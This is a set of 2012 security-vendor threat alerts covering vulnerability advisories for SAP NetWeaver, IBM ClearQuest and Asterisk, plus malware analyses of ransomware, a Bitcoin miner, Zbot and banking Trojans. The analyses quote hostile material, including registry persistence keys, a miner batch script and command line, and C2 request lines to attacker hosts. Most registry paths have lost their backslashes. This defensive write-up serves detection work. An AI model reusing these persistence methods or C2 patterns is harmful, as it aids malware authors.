SAP NetWeaver Buffer Overflow (June 1, 2012)

/in /by

SAP NetWeaver is a software framework that provides the foundation for applications in SAP’s Business Suite. It includes development and runtime environments for SAP and custom applications. NetWeaver uses the ABAP programming language developed by SAP. It is specifically designed to cater to business application development. NetWeaver uses industry standards allowing it to be integrated with other programming frameworks such as dotNET and Java.

Upon installation, NetWeaver starts multiple services and processes to handle incoming network requests. One such processes is the Dispatcher, which manages requests sent in by users and handles different types of transactions. One of the transaction types handled is the Diagnostic transaction. This transaction requires an initial connection setup message followed by the request itself. Network communication utilizes a proprietary SAP protocol which is not publicly documented.

The Diagnostic transaction request, denoted by a specific code, includes a field containing a NULL terminated string. The following table illustrates the diagnostic transaction request structure: 

 Offset     Bytes        Description ---------- ------------ ------------------------------------- 0x0000     4            length 0x0004     8            unknown 0x000C     9            unknown 0x0015     3            message code 0x0018     2            unknown 0x001A     ?            string

A buffer overflow vulnerability exists in SAP NetWeaver’s Dispatcher process due to an error during handling of certain Diagnostic request messages. Specifically, upon receiving a request, the vulnerable code fails to validate the length of a string contained in the message. The string is expanded to Unicode and copied into a stack buffer of a fixed size, without validation of the string length. This can result in a stack buffer overflow, corrupting the stack and overwriting important data such as function variables and return addresses.

A remote, unauthenticated attacker can leverage this vulnerability by sending a Diagnostic request with an overly large string to the vulnerable service. Successful exploitation would allow execution of arbitrary code in the security context of the service. If an exploitation attempt fails, the server may terminate abnormally.
The risk of this vulnerability is mitigated by a required non-default service configuration.

Dell SonicWALL has released an IPS signature to address this issue. The following signature was released:

  • 7917 – SAP NetWeaver Dispatcher Buffer Overflow Attempt

This vulnerability has been assigned CVE-2012-2611 by mitre.

IBM Rational ClearQuest ActiveX Buffer Overflow (May 25, 2012)

/in /by

IBM Rational ClearQuest is a management system that monitors and manages comprehensive software changes in the system. It provides change tracking, process automation, reporting and lifecycle traceability for better visibility and control of the software development lifecycle. It supports multiple operating systems, including AIX, HP-UX, Linux, Solaris (Sun microsystems), Windows family.

The IBM Rational ClearQuest supports the connection to various data sources, for example, the Rational ClearQuest database. The CQOle ActiveX control in cqole.dll in IBM Rational ClearQuest can be used to connect to the database by a web user. The CQOle ActiveX control provides multiple API methods for users to contact the database.

A heap-based buffer overflow is found in the Ole API in the CQOle ActiveX control in cqole.dll in the vulnerable versions of IBM Rational ClearQuest. The vulnerability is due to an insufficient validation of the user supplied data, which may overwrite a specific content in the memory.

Dell SonicWALL UTM team has researched this vulnerability and created the following IPS signature to detect the attacks addressing this issue.

  • 7849 IBM Rational ClearQuest CQOle ActiveX Heap Buffer Overflow

This vulnerability is referred by CVE as CVE-2012-0708.

New German Ransomware (May 25, 2012)

/in /by

Dell SonicWALL Threats Research team discovered a new German Ransomware Trojan being spammed in the wild. The spammed e-mail contains a fake premium membership order confirmation at a partner agency and informs the user to open the attachment for elite account cancellation policy details. The attachment contains the new Ransomware Trojan. A sample e-mail message looks like below:

Translated e-mail: (Credit: Google Translate)

Attachment: Registration.zip
Subject: Your partner agency order (UserName) No. 809119652
Body:

Thank you for your trust (UserName)

You have just ordered www.Meinestadt.ch at the partner agency, the premium membership. The amount of 557.19 EUR is amortized over the next days of your account. The move made ??by Lugyment AG.

You are now ready for the next 6 months premium member and can use the full size premium options.Please refrain from using the contract information of the supplement, it also contains the invoice data and elite service benefits. If you no longer want the Elite membership, please email the withdrawal, with the attached in the Appendix, attached cancellation policy.

(UserName), we wish you good luck!

Sincerely, Mary Moeller
Support Team

The attached zip file contains the new Ransomware Trojan with an icon disguised as a MS-DOS shortcut file:

If the user opens the file, it will perform following activity on the victim’s machine:

  • It drops multiple copies of itself as:
    • (Application Data)(Random foldername)(Random alphanumeric 20 characters).exe
    • (Windows System)(Random alphanumeric 20 characters).exe
  • Creates a new instance of system program ctfmon.exe and injects it with the malicious code.
  • It modifies the windows registry to ensure that the dropped copies get executed on system reboot and also disables some system tools:
    • HKU(USERID)SoftwareMicrosoftWindowsCurrentVersionRun8A54A84: “(Application Data)Jvreanqxgf16E41E5F08A54A8497CF.exe”
    • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit: “C:WINDOWSsystem32userinit.exe ,C:WINDOWSsystem32D268837808A54A8476D4.exe,”
    • HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystemDisableRegedit: 0x00000001
    • HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystemDisableTaskMgr: 0x00000001
    • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exeDebugger: “P9KDMF.EXE”
    • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exeDebugger: “P9KDMF.EXE”
    • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionstaskmgr.exeDebugger: “P9KDMF.EXE”
  • Disables the Windows Safe Mode by deleting the relevant registry keys.
  • It communicates with a remote server hosted in Beijing, China to register the infection and receive further instructions. The communication data between the malware and control server is encrypted. Below are some of the requests that we saw in our analysis:

  • Complete list of control server URLs that we found in the code analysis:

  • Complete list of commands that the server can send based on our code analysis:
    • IMAGES
    • GEO
    • LOCK
    • UNLOCK
    • URLS
    • EXECUTE
    • KILL
    • UPGRADE
    • UPGRADEURL
    • LOAD
    • WAIT
    • MESSAGE
  • The first GET request causes the control server to return a Microsoft CAB file containing images that will be displayed by the Ransomware when it locks the system:

  • The second GET request fetches the Ransomware message in German from the control server.

    Translated Message (Credit: Google Translate)

    Ladies and Gentlemen,
    apparently the update program has been completely disrupted. Now the virus can only be removed manually. This you need to use your files to. So if you need the locked data, please send us 200 euros Ukash code to the email: security-center@inbox.lt so soon, this code has been tested, you will receive an update program. If you need your data, we strongly advise you to reformat your computer to completely remove the virus. Ukash can be purchased at any gas station and in several Internet cafes in your area.
    mfG Your Security Team

  • The Ransomware will lock the system with the following image once it receives the LOCK command from the control server asking the user to pay 200 euros:

Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Ransom.GA (Trojan)

New Bitcoin miner Trojan spotted in the wild (May 18, 2012)

/in /by

The Sonicwall UTM research team received reports of a new Bitcoin Miner Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. This kind of malware has been covered in a previous sonicalert but has recently become more and more prevalent as attackers recognise it as an easy and effective way to generate and transfer currency without being caught.

The Trojan [Detected as GAV: CoinMiner.I_3 (Trojan)] uses the following icon:

The Trojan makes the following DNS request:

The Trojan adds the following keys to the windows registry to enable startup after reboot:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun adobeupdate “”%AppData%8 8l3.lnk””
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun adobeupdater “”%AppData%8 8rundll32.exe””

The Trojan adds the following files to the filesystem:

  • %AppData%8 8API.class
  • %AppData%8 8API.java
  • %AppData%8 8bat.bat
  • %AppData%8 8bt.lnk [points to bat.bat]
  • %AppData%8 8diablo120328.cl
  • %AppData%8 8diakgcn120427.cl
  • %AppData%8 8l3.lnk [points to svchost.exe]
  • %AppData%8 8libcurl-4.dll
  • %AppData%8 8libpdcurses.dll
  • %AppData%8 8libusb-1.0.dll
  • %AppData%8 8miner.php
  • %AppData%8 8OpenCL.dll [for GPU features]
  • %AppData%8 8phatk120223.cl
  • %AppData%8 8poclbm120327.cl
  • %AppData%8 8pthreadGC2.dll
  • %AppData%8 8rundll32.exe [An application called StealthRunner]
  • %AppData%8 8settings.txt [Used by rundll32.exe (StealthRunner)]
  • %AppData%8 8svchost.exe [Detected as GAV: Ainslot.AA_12 (Trojan)]
  • %AppData%8 8svchost2.exe [Detected as GAV: Ainslot.AA_12 (Trojan)]

rundll32.exe is an application called StealthRunner that is written by a user on the bitcointalk.org forum. It uses the following icon:

svchost.exe and svchost2.exe use the following icons:

bat.bat contains the following text:

      @echo off
      %windir%system32taskkill.exe /im svchost.exe
      %windir%system32taskkill.exe /im rundll32.exe
      %windir%system32taskkill.exe /im svchost2.exe
      %windir%system32reg.exe add HKCUsoftwaremicrosoftwindowscurrentversionrun /v adobeupdate /d ""%appdata%3 4l3.lnk"" /f
      %windir%system32reg.exe add HKCUsoftwaremicrosoftwindowscurrentversionrun /v adobeupdater /d ""%appdata%3 4rundll32.exe"" /f

settings.txt contains the bitcoin mining account data of the attacker:

      svchost2.exe -o http://eu.triplemining.com:8344 -u klazim2000_3 -p 7747 [commandline for miner]
      3
      0

The Trojan was observed communicating with the mining server:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.I_3 (Trojan)
  • GAV: Ainslot.AA_12 (Trojan)

Microsoft Security Bulletin Coverage (May 8, 2012)

/in /by

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of May, 2012. A list of issues reported, along with SonicWALL coverage information follows:

MS12-029 Vulnerability in Microsoft Word Could Allow Remote Code Execution (2680352)

  • CVE-2012-0183 RTF Mismatch Vulnerability
    GAV: 18584 – Malformed-File rtf.MP.2

MS12-030 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2663830)

  • CVE-2012-0141 Excel File Format Memory Corruption Vulnerability
    GAV: 18668 – Malformed-File xls.MP.9
  • CVE-2012-0142 Excel File Format Memory Corruption in OBJECTLINK Record Vulnerability
    GAV: 18672 – Malformed-File xls.MP.10
  • CVE-2012-0143 Excel Memory Corruption Using Various Modified Bytes Vulnerability
    GAV: 18675 – Malformed-File xls.MP.11
  • CVE-2012-0184 Excel SXLI Record Memory Corruption Vulnerability
    GAV: 18676 – Malformed-File xls.MP.12
  • CVE-2012-0185 Excel MergeCells Record Heap Overflow Vulnerability
    GAV: 18677 – Malformed-File xls.MP.13
  • CVE-2012-1847 Excel Series Record Parsing Type Mismatch Could Result in Remote Code Execution Vulnerability
    GAV: 18678 – Malformed-File xls.MP.14
    GAV: 18679 – Malformed-File xls.MP.15

MS12-031 Vulnerability in Microsoft Visio Viewer 2010 Could Allow Remote Code Execution (2597981)

  • CVE-2012-0018 VSD File Format Memory Corruption Vulnerability
    GAV: 18603 – Malformed-File vsd.MP.1

MS12-032 Vulnerability in TCP/IP Could Allow Elevation of Privilege (2688338)

  • CVE-2012-0174 Windows Firewall Bypass Vulnerability
    There is no feasible method of detection at gateway level.
  • CVE-2012-0179 TCP/IP Double Free Vulnerability
    This is a local vulnerability.

MS12-033 Vulnerability in Windows Partition Manager Could Allow Elevation of Privilege (2690533)

  • CVE-2012-0178 Plug and Play (PnP) Configuration Manager Vulnerability
    This is a local vulnerability.

MS12-034 Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight (2681578)

  • CVE-2011-3402 TrueType Font Parsing Vulnerability
    GAV: 18600 – Malformed-File ttf.MP.1
  • CVE-2011-0159 TrueType Font Parsing Vulnerability
    GAV: 18601 – Malformed-File ttf.MP.2
  • CVE-2012-0162 .NET Framework Buffer Allocation Vulnerability
    GAV: 18521 – Malformed-File exe.MP.3
  • CVE-2012-0164 .NET Framework Index Comparison Vulnerability
    There is no feasible method of detection.
  • CVE-2012-0165 GDI+ Record Type Vulnerability
    GAV: 18516 – Malformed-File emf.MP.3
    GAV: 18680 – Malformed-File xls.MP.16
  • CVE-2012-0167 GDI+ Heap Overflow Vulnerability
    GAV: 18510 – Malformed-File emf.MP.1
    GAV: 18514 – Malformed-File emf.MP.2
  • CVE-2012-0176 Silverlight Double-Free Vulnerability
    There is no feasible method of detection.
  • CVE-2012-0180 Windows and Messages Vulnerability
    This is a local vulnerability.
  • CVE-2012-0181 Keyboard Layout File Vulnerability
    This is a local vulnerability.
  • CVE-2012-1848 Scrollbar Calculation Vulnerability
    This is a local vulnerability.

MS12-035 Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2693777)

  • CVE-2012-0160 .NET Framework Serialization Vulnerability
    This is a local vulnerability.
  • CVE-2012-0161 .NET Framework Serialization Vulnerability
    GAV: 18522 – Malformed-File exe.MP.4

Digium Asterisk Manager Command Execution (May 17, 2012)

/in /by

Asterisk is a software implementation of a telephone private branch exchange (PBX). Like any PBX, it allows attached telephones to make calls to one another, and to connect to other telephone services including the public switched telephone network (PSTN) and Voice over Internet Protocol (VoIP) services. Asterisk is released under a dual license model, using the GNU General Public License (GPL) as a free software license and a proprietary software license to permit licensees to distribute proprietary, unpublished system components.

Asterisk supports a wide range of video and Voice over IP protocols, including the Session Initiation Protocol (SIP), the Media Gateway Control Protocol (MGCP), and H.323. Asterisk can interoperate with most SIP telephones, acting both as registrar and as a gateway between IP phones and the PSTN.

The Asterisk Manager Interface (AMI) protocol is a very simple protocol that allows you to communicate and manage your asterisk server, almost completely. The Asterisk Manager Interface (AMI) allows a client program to connect to an Asterisk instance and issue commands or read events over a TCP/IP stream. AMI defines 3 kind of possible packets:

  • Actions: This kind of packet is what the client sends. Only the client can generate Actions.
  • Responses: Actions have at least one Response, indicating the result of the executed (or requested) action.
  • Events: There are two kinds of events. The ones attached to a particular response for a particular action, and the ones that asterisk generate to inform the connected client about things that are happening in the server (like call events, changes in variables values, agents and other clients that connect/disconnect to/from the server, etc).

A typical action is the Login action, which looks like this: (CRLF presents carriage return and new line characters)

 	Action: Login[CRLF] 	Username: admin[CRLF] 	Secret: mysecret[CRLF] 	ActionId: 1a2b[CRLF] 	[CRLF]

A security bypass vulnerability exists in Digium Asterisk. If Asterisk receives a specially crafted action request from a user, it may allow the unauthorized user to execute administrator commands. A remote, authenticated attacker could exploit this vulnerability to crack into a vulnerable Asterisk server.

Dell SonicWALL UTM team has researched this vulnerability and released the following IPS signatures to detect the attacks addressing this issue.

  • 7839 Digium Asterisk Manager Interface Remote Command Execution

This vulnerability has been referred by CVE as CVE-2012-2414.

Chinese new year wishes leads to Zbot Trojan (Jan 26, 2012)

/in /by

SonicWALL UTM Research team discovered a new variant of Zbot Trojan being spammed in the wild. The spam campaign in this email exploits the timing of the Chinese new year. The spammed email contains an attached PDF with wishes for the Chinese new year along with a link. The link appears to point to the website of the Ministry of Foreign Affairs of the People’s Republic of China but it in fact leads to a malicious domain hosting a newer variant of the Zbot Trojan.

The contents of the attached PDF file is shown below:

screenshot

The contents of the PDF file translates to:

Brother, Happy Dragon year, and I give you my best wishes!
Thank you for sending me your greetings. I feel the warmth inside.
Long time no contact, I’m not sure if you are still working in China?
[MALICIOUS LINK] Chaili

It performs the following activities when executed:

  • It injects code in to winlogon.exe and svchost.exe

  • It creates the following files:
    • %windir%system32sdra64.exe (Copy of itself) [Detected as GAV: “Zbot.DRGN (Trojan)]
    • %windir%system32lowseclocal.ds (Encrypted config file)
    • %windir%system32lowsecuser.ds (Collected user information)

  • It modifies the created and accessed timestamp of %windir%system32sdra64.exe to an older date in 2002 in order to avoid suspicion. It also modifies the files attributes to be read only and hidden.

  • It download an encrypted configuration file from a remote domain:
    • GET /libraries/joomla/spm.bin HTTP/1.1
      The configuration file when decrypted was found to contain the remote C&C sever, custom hosts file and a list of banking and e-commerce sites to monitor and intercept credentials from along with the HTML pages to be injected

  • It contacts a remote C&C server and uploads scrounged cookies and stolen credentials:
    • POST /tmp_m/hwnehj/gate.php HTTP/1.1
  • It replaces the hosts file in order to be prevent AntiVirus updates:
    • screenshot
  • It modifies the following registry key to ensure infection on reboot:
    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon:Userinit “%windir%system32userinit.exe,%windir%system32sdra64.exe,”

This newer Zbot variant has very low AV detection at the time of writing this alert.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: Zbot.DRGN (Trojan)

Million dollar Tax draw spam leads to Banker Trojan (Feb 10, 2012)

/in /by

SonicWALL UTM Research team found a new Banking Trojan variant being spammed heavily over the past three days. The spammed e-mail pretends to contain a Bank form asking the user to confirm an ACH transfer worth one million dollars. The zipped attachment in the email actually contains a malicious executable file that uses Right-To-Left override technique to present itself as a document file.

SonicWALL Research team have captured more than 2000 copies of e-mail from this spam campaign in past 48 hours. Below are some sample messages:

screenshot

The malicious executable found in the zipped attachments looks like:

screenshot

Upon execution, it performs the following activities:

  • Drops a copy of itself and runs it:

    • (Application Data)KB00903122.exe [Detected as GAV: Injector.NYF (Trojan)]

  • Registry modifications:

    • HKUUserIDSoftwareMicrosoftWindows Media Center [Uses this key to save banking site list and script to inject]
    • HKUUserIDSoftwareMicrosoftWindowsCurrentVersionInternet SettingsGlobalUserOffline: 0x00000000
    • HKUUserIDSoftwareMicrosoftWindowsCurrentVersionRunKB00903122.exe: “”(Application Data)KB00903122.exe””

  • Connects to a remote server to send victim machine’s information and receives a list of banking sites & script to inject: 
     			POST /rwx/B1_3n9/in/ HTTP/1.1 			Host: hmvmgywkvayilcwh.ru:8080

    screenshot
    screenshot

SonicWALL Gateway AntiVirus provides proactive protection against this spam campaign via following signature:

  • GAV: Injector.NYF (Trojan)
  • GAV: Suspicious#rtol.dc (Trojan)

screenshot

Hotel Reservation spam campaign leads to Trustezeb Trojan (Feb 17, 2012)

/in /by

SonicWALL UTM Research team observed an increase in spam emails employing hotel reservation spam themes. The emails pretending to be from booking.com informs the recipient that their hotel reservation has been confirmed and that the reservation information is attached. The zipped attachment in the email is a variant of Trustezeb Trojan. This Trojan is specifically crafted to target Trusteer’s security products by attaching itself to run with the execution of some of Trusteer’s processes.

The spam campaign is shown below:

screenshot

It performs the following activities when executed:

  • It injects code in to svchost.exe

  • It creates the following files:
    • %windir%system32A37C0BC49C3B4DC6F27C.exe (Copy of itself) [Detected as GAV: Trustezeb.A_2 (Trojan)]
    • Program FilesTrusteerRapportbinRapportService.exe [Detected as GAV: FakeTruste.A (Trojan) (Trojan)]
    • %windir%RPService.exe [Detected as GAV: FakeTrusteer.A (Trojan) (Trojan)]

  • It modifies the following registry entry to ensure infection on reboot:
    • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit: “%windirsystem32userinit.exe,%windir%System32A37C0BC49C3B4DC6F27C.exe,”

  • It creates to following registry entries to add itself as a debugger for Trusteer processes. This ensures it is executed in the execution sequence of these Trusteer products:
    • HKLMSOFTWAREClassesMyEze.1shellopencommand: “%SystemRoot%system32RPService.exe %0 %1 %2”
    • HKLMSOFTWAREClassesMyEze.1shelleditcommand: “%SystemRoot%system32RPService.exe %0 %1 %2”
    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRapportMgmtService.exe Debugger “RPService.exe”
    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRapportService.exe Debugger “RPService.exe”
    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRapportSetup-Full.exe Debugger “RPXService.exe”
    • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRapportSetup.exe Debugger “RPXService.exe”

  • The following commands were found during analysis
    • IMAGES
    • GEO
    • LOCK
    • UNLOCK
    • URLS
    • EXECUTE
    • KILL
    • UPGRADE
    • WAIT

  • It contacts a remote command and control server for further instructions:
    • {removed}/asdfasdgfs/Fiur5sDzx2col.php

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Trustezeb.A (Trojan)
  • GAV: Trustezeb.A_2 (Trojan)
  • GAV: FakeTruste.A (Trojan)

FakeAV spam campaign continues with Smart Protection 2012 (Feb 24, 2012)

/in /by

The Sonicwall UTM research team has observed a recent continued FakeAV spam campaign effort. The underlying malware used is similar to that of a previous sonicalert. The FakeAV being spammed is named Smart Protection 2012 and uses the usual scare tactics to encourage the user to buy a license to disinfect the system.

The Trojan spreads through an email purported to be from FedEX Services. It requests the user to open and run the attachment that contains the Trojan:

The Trojan uses the following icon to masquerade as a harmless PDF file:

Upon infection, the Trojan makes the following changes to the file system:

It copies itself to:

  • C:Documents and Settings{USER}Application Data81732E.exe [Detected as GAV: FakeAV.A_4 (Trojan)]

It creates the following files:

  • C:Documents and Settings{USER}Local Settingstemp311.tmp [Detected as GAV: Winwebsec.AQUR_4 (Trojan)]
  • C:Documents and Settings{USER}Local Settingstemp312.tmp [Detected as GAV: Winwebsec.AQUR_4 (Trojan)]

It adds the following key to the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun Intel “C:Documents and Settings{USER}Application Data81732E.exe”

The Trojan makes the following DNS requests:

  • www.google.com
  • tropic18854.ru
  • www.alphonsgunther.com
  • www.m-land.hu
  • www.mercierautos.ca

The Trojan downloads 1.exe from a remote webserver. It saves and runs it as 311.tmp and 312.tmp.

The Trojan was observed sending potentially sensitive encrypted system information to a remote webserver:

The Trojan Pops up the following windows upon infection:

The Trojan will display fake infection results:

If the “Remove all threats now” button is pressed it will display the following payment page:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: FakeAV.A_4 (Trojan)
  • GAV: Winwebsec.AQUR_4 (Trojan)